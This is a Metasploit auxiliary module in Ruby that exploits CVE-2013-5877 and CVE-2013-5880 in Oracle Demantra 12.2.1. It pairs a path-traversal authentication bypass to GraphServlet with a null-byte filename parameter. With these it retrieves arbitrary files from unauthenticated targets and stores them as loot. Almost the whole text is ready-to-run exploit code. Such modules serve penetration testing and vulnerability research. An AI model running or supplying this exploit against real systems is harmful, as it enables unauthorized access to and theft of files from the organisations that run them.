## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass', 'Description' => %q{ This module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine. }, 'References' => [ [ 'CVE', '2013-5877'], [ 'CVE', '2013-5880'], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/'] ], 'Author' => [ 'Oliver Gruskovnjak' ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2014-02-28' )) register_options( [ Opt::RPORT(8080), OptBool.new('SSL', [false, 'Use SSL', false]), OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini']) ]) end def run_host(ip) filename = datastore['FILEPATH'] authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet" res = send_request_cgi({ 'uri' => normalize_uri(authbypass), 'method' => 'POST', 'encode_params' => false, 'vars_post' => { 'filename' => "#{filename}%00" } }) if res.nil? or res.body.empty? fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}") end if res.code == 404 print_error("#{rhost}:#{rport} - File not found") return end if res.code == 200 print_status("#{ip}:#{rport} returns: #{res.code.to_s}") fname = File.basename(datastore['FILEPATH']) path = store_loot( 'oracle.demantra', 'application/octet-stream', ip, res.body, fname) print_good("#{ip}:#{rport} - File saved in: #{path}") end end end